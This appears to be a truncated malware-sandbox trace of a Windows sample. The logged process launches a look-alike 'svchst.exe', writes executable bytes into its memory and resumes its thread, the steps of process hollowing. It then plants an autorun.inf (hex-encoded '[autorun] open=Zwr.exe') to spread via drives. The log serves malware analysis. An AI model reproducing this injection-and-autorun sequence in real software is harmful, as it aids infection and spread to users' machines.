File opened Path: y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547367145
Thread delayed Time: -120 TID: 1152 success or wait 547368044
File opened Path: y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547368711
File opened Path: x: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547372162
File opened Path: x: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547373100
File opened Path: w: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547375219
File opened Path: w: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547377206
File opened Path: v: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547380537
File opened Path: v: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547381235
File opened Path: u: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547383211
File opened Path: u: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547384203
File opened Path: t: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547392398
File opened Path: t: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547393334
File opened Path: s: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547395222
File opened Path: s: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547396218
File opened Path: r: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547399932
File opened Path: r: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547400548
File opened Path: q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547402402
File opened Path: q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547402597
File opened Path: p: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547402909
File opened Path: p: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547403600
File opened Path: o: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547407084
File opened Path: o: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547407282
File opened Path: n: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547407607
File opened Path: n: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547408035
Process created PID: 1616 Path: C:\WINDOWS\svchst.exe Cmdline: C:\WINDOWS\svchst.exe Createflags: none success or wait 547409500
File opened Path: m: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547411344
File opened Path: m: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547412210
File opened Path: l: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547413744
File opened Path: l: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547414626
File opened Path: k: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547423021
File opened Path: k: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547423748
File opened Path: j: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547426235
File opened Path: j: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547428170
File opened Path: i: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547431057
File opened Path: i: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547432012
File opened Path: h: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547434658
File opened Path: h: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547442607
File opened Path: g: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547445752
File opened Path: g: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547445962
File opened Path: f: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547446269
File opened Path: f: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547447509
File opened Path: e: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547451396
File opened Path: e: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547451604
Directory Information Queried Path: C:\ Disposition: BothDirectoryInformation Filemask: * success or wait 547456844
Directory Information Queried Path: C:\ Disposition: BothDirectoryInformation Filemask: unknown success or wait 547457441
Directory Information Queried Path: C:\Documents and Settings Disposition: BothDirectoryInformation Filemask: * success or wait 548105655
Directory Information Queried Path: C:\Documents and Settings Disposition: BothDirectoryInformation Filemask: unknown success or wait 548105866
Directory Information Queried Path: C:\Documents and Settings\Administrator Disposition: BothDirectoryInformation Filemask: * success or wait 548108900
Directory Information Queried Path: C:\Documents and Settings\Administrator Disposition: BothDirectoryInformation Filemask: unknown success or wait 548109084
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data Disposition: BothDirectoryInformation Filemask: * success or wait 548110662
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data Disposition: BothDirectoryInformation Filemask: unknown success or wait 548113095
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe Disposition: BothDirectoryInformation Filemask: * success or wait 548119586
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe Disposition: BothDirectoryInformation Filemask: unknown success or wait 548119793
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat Disposition: BothDirectoryInformation Filemask: * success or wait 548127219
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat Disposition: BothDirectoryInformation Filemask: unknown success or wait 548127418
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0 Disposition: BothDirectoryInformation Filemask: * success or wait 548129801
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0 Disposition: BothDirectoryInformation Filemask: unknown success or wait 548131758
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Collab Disposition: BothDirectoryInformation Filemask: * success or wait 548133313
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Collab Disposition: BothDirectoryInformation Filemask: unknown success or wait 548139909
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Collab Disposition: BothDirectoryInformation Filemask: unknown no more files 548140063
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms Disposition: BothDirectoryInformation Filemask: * success or wait 548144900
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms Disposition: BothDirectoryInformation Filemask: unknown success or wait 548145074
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms Disposition: BothDirectoryInformation Filemask: unknown no more files 548145221
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts Disposition: BothDirectoryInformation Filemask: * success or wait 548178273
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts Disposition: BothDirectoryInformation Filemask: unknown success or wait 548178716
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts Disposition: BothDirectoryInformation Filemask: unknown no more files 548179184
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0 Disposition: BothDirectoryInformation Filemask: unknown no more files 548193334
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat Disposition: BothDirectoryInformation Filemask: unknown no more files 548208799
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player Disposition: BothDirectoryInformation Filemask: * success or wait 548228180
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player Disposition: BothDirectoryInformation Filemask: unknown success or wait 548228607
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache Disposition: BothDirectoryInformation Filemask: * success or wait 548260481
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache Disposition: BothDirectoryInformation Filemask: unknown success or wait 548261516
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRW Disposition: BothDirectoryInformation Filemask: * success or wait 548273410
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRW Disposition: BothDirectoryInformation Filemask: unknown success or wait 548273936
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRW Disposition: BothDirectoryInformation Filemask: unknown no more files 548274308
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache Disposition: BothDirectoryInformation Filemask: unknown no more files 548306620
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player Disposition: BothDirectoryInformation Filemask: unknown no more files 548309127
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics Disposition: BothDirectoryInformation Filemask: * success or wait 548320962
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics Disposition: BothDirectoryInformation Filemask: unknown success or wait 548330450
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries Disposition: BothDirectoryInformation Filemask: * success or wait 548350625
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries Disposition: BothDirectoryInformation Filemask: unknown success or wait 548351052
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary Disposition: BothDirectoryInformation Filemask: * success or wait 548363063
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary Disposition: BothDirectoryInformation Filemask: unknown success or wait 548363500
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all Disposition: BothDirectoryInformation Filemask: * success or wait 548379218
Memory allocated PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 400000 Length: 12FAB0 Allocation Type: unknown Protection: page read and write success or wait 548381940
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all Disposition: BothDirectoryInformation Filemask: unknown success or wait 548382832
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all Disposition: BothDirectoryInformation Filemask: unknown no more files 548384496
Memory written PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 400000 Length: 4096 Value: 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57 69 6E 33 32 0D 0A 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 548401031
Memory written PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 426000 Length: 73216 Value: 2E 66 FE FF 04 10 40 00 03 07 42 6F 6F 6C 65 61 6E 01 00 04 15 FF DD F6 FF 05 46 61 6C 73 65 04 54 72 75 65 8D 0D 2C 11 01 07 49 6E 74 65 67 65 72 FE BB 6F BB 04 21 80 FF 00 7F 8B C0 44 17 0A 06 53 74 72 69 6E 67 98 EF BD 41 E6 0B 00 1F 3A 0B 4D D3 74 CB 14 39 20 03 24 28 1C A0 EE BF 69 96 36 BC F8 07 54 4F 62 6A 65 63 74 A4 33 DB 6D D9 B0 07 0C 60 71 79 73 8A 6D 64 FF DD 6D 08 C4 12 0F 0A 49 98 72 66 61 63 65 C1 DB 41 CE BE 00 C0 2D 46 03 00 B2 CC 4F 32 D9 FF 83 44 24 04 F8 E9 11 00 49 64 09 8C A0 CC CC 21 9B FD BA F1 50 FB FE 11 40 48 4B 76 0D 41 BA 11 17 08 17 8C 0E 1D 11 C8 DD B7 C2 F7 1F 0C F3 4C 10 40 2F 79 C9 E5 3C 59 48 59 58 59 11 54 FD 85 D9 64 C6 64 F0 5F FF 25 B8 E1 42 00 20 83 0C F2 07 B4 B0 AC 83 0C 32 C8 A8 A4 A0 9C 0C 32 C8 20 98 94 90 32 success or wait 548495964
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grm Disposition: BothDirectoryInformation Filemask: * success or wait 548496966
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grm Disposition: BothDirectoryInformation Filemask: unknown success or wait 548504690
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grm Disposition: BothDirectoryInformation Filemask: unknown no more files 548505536
Memory written PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 438000 Length: 1024 Value: 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 02 00 06 00 00 00 20 00 00 80 0A 00 00 00 80 01 00 80 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 07 00 FA 0F 00 00 68 00 00 80 FB 0F 00 00 90 00 00 80 FC 0F 00 00 B8 00 00 80 FD 0F 00 00 E0 00 00 80 FE 0F 00 00 08 01 00 80 FF 0F 00 00 30 01 00 80 00 10 00 00 58 01 00 80 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 80 00 00 00 18 42 03 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 A8 00 00 00 70 44 03 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 D0 00 00 00 C4 46 03 00 EC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 F8 00 00 00 B0 47 03 00 98 01 00 success or wait 548531694
Memory written PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 7FFDF008 Length: 4 Value: 00 00 40 00 success or wait 548553274
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgr Disposition: BothDirectoryInformation Filemask: * success or wait 548553443
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgr Disposition: BothDirectoryInformation Filemask: unknown success or wait 548554789
Thread context set TID: 1136 PID: 1616 DR0: 0 DR1: 0 DR2: 0 DR3: 0 DR7: 0 EIP: 0 EFLAGS: 0 Imagepath: null success or wait 548565596
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgr Disposition: BothDirectoryInformation Filemask: unknown no more files 548565787
Thread resumed TID: 1136 PID: 1616 Path: C:\WINDOWS\svchst.exe success or wait 548566651
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary Disposition: BothDirectoryInformation Filemask: unknown no more files 548571436
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries Disposition: BothDirectoryInformation Filemask: unknown no more files 548579211
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics Disposition: BothDirectoryInformation Filemask: unknown no more files 548595989
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe Disposition: BothDirectoryInformation Filemask: unknown no more files 548603393
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Identities Disposition: BothDirectoryInformation Filemask: * success or wait 548614672
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Identities Disposition: BothDirectoryInformation Filemask: unknown success or wait 548615091
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E} Disposition: BothDirectoryInformation Filemask: * success or wait 548622622
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E} Disposition: BothDirectoryInformation Filemask: unknown success or wait 548623282
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E} Disposition: BothDirectoryInformation Filemask: unknown no more files 548623616
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Identities Disposition: BothDirectoryInformation Filemask: unknown no more files 548634862
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia Disposition: BothDirectoryInformation Filemask: * success or wait 548642865
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia Disposition: BothDirectoryInformation Filemask: unknown success or wait 548643064
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player Disposition: BothDirectoryInformation Filemask: * success or wait 548651485
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player Disposition: BothDirectoryInformation Filemask: unknown success or wait 548652342
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects Disposition: BothDirectoryInformation Filemask: * success or wait 548670690
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects Disposition: BothDirectoryInformation Filemask: unknown success or wait 548672602
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWL Disposition: BothDirectoryInformation Filemask: * success or wait 548678812
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWL Disposition: BothDirectoryInformation Filemask: unknown success or wait 548693881
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWL Disposition: BothDirectoryInformation Filemask: unknown no more files 548707042
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects Disposition: BothDirectoryInformation Filemask: unknown no more files 548723454
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com Disposition: BothDirectoryInformation Filemask: * success or wait 548747828
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com Disposition: BothDirectoryInformation Filemask: unknown success or wait 548750177
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support Disposition: BothDirectoryInformation Filemask: * success or wait 548756203
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support Disposition: BothDirectoryInformation Filemask: unknown success or wait 548756932
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer Disposition: BothDirectoryInformation Filemask: * success or wait 548768020
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer Disposition: BothDirectoryInformation Filemask: unknown success or wait 548768636
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys Disposition: BothDirectoryInformation Filemask: * success or wait 548771353
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys Disposition: BothDirectoryInformation Filemask: unknown success or wait 548772234
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys Disposition: BothDirectoryInformation Filemask: unknown no more files 548775664
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer Disposition: BothDirectoryInformation Filemask: unknown no more files 548778784
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support Disposition: BothDirectoryInformation Filemask: unknown no more files 548788175
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com Disposition: BothDirectoryInformation Filemask: unknown no more files 548795139
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com Disposition: BothDirectoryInformation Filemask: * success or wait 548817144
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com Disposition: BothDirectoryInformation Filemask: unknown success or wait 548818850
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin Disposition: BothDirectoryInformation Filemask: * success or wait 548831850
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin Disposition: BothDirectoryInformation Filemask: unknown success or wait 548832338
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\fpupdateax Disposition: BothDirectoryInformation Filemask: * success or wait 548840551
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\fpupdateax Disposition: BothDirectoryInformation Filemask: unknown success or wait 548841190
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\fpupdateax Disposition: BothDirectoryInformation Filemask: unknown no more files 548841552
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin Disposition: BothDirectoryInformation Filemask: unknown no more files 548851630
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com Disposition: BothDirectoryInformation Filemask: unknown no more files 548856845
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player Disposition: BothDirectoryInformation Filemask: unknown no more files 548860105
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia Disposition: BothDirectoryInformation Filemask: unknown no more files 548871363
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Microsoft Disposition: BothDirectoryInformation Filemask: * success or wait 548877826
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Microsoft Disposition: BothDirectoryInformation Filemask: unknown success or wait 548878595
File created Path: c:\autorun.inf Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: true success or wait 976940839
File write Path: C:\autorun.inf Offset: unknown Length: 23 Value: 5b 61 75 74 6f 72 75 6e 5d 0d 0a 6f 70 65 6e 3d 5a 77 72 2e 65 78 65 success or wait 976975759
File opened Path: c:\autorun.inf Access: read attributes and synchronize and generic read Options: sequential only and synchronous io non alert and non directory file and open reparse point Attributes: none Content Overwritten: true success or wait 976977794
File created Path: D:\ Access: read attributes and delete and synchronize and generic write Options: sequential only and synchronous io non alert and non directory file Attributes: archive Content Overwritten: true access denied 976982348
File created Path: D:\ Access: read attributes and delete and synchronize and generic write Options: sequential only and synchronous io non alert and non directory file Attributes: archive Content Overwritten: true access denied 976983095
File created Path: D:\ Access: read attributes and delete and synchronize and generic write Options: sequential only and synchronous io non alert and non directory file Attributes: archive Content Overwritten: true access denied 976983813
File deleted Path: C:\autorun.inf New path: Disposition: Data : success or wait 976985898
File opened Path: G: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976987994
File opened Path: G: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976988709
File opened Path: G: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976989674
File opened Path: G: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976990265
File opened Path: G: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976991209
File opened Path: G: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976991799
File opened Path: H: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976992799
File opened Path: H: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976993426
File opened Path: H: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976994406
File opened Path: H: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976994995
File opened Path: H: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976995939
File opened Path: H: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976996528
File opened Path: I: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976997472
File opened Path: I: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976998055
File opened Path: I: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976998997
File opened Path: I: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976999580
File opened Path: I: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977000521
File opened Path: I: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977001105
File opened Path: J: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977002045
File opened Path: J: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977002630
File opened Path: J: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977003666
File opened Path: J: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977004251
File opened Path: J: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977005193
File opened Path: J: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977005780
File opened Path: K: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977006724
File opened Path: K: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977007313
File opened Path: K: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977008256
File opened Path: K: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977008842
File opened Path: K: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977009783
File opened Path: K: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977010369
File opened Path: L: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977011312
File opened Path: L: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977011901
File opened Path: L: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977012902
File opened Path: L: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977013496
File opened Path: L: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977014440
File opened Path: L: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977015026
File opened Path: M: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977015967
File opened Path: M: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977016556
File opened Path: M: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977018070
File opened Path: M: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977018662
File opened Path: M: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977019605
File opened Path: M: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977020193
File opened Path: N: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977021226
File opened Path: N: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977021950
File opened Path: N: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977022899
File opened Path: N: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977023484
File opened Path: N: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977024427
File opened Path: N: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977025014
File opened Path: O: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977025957
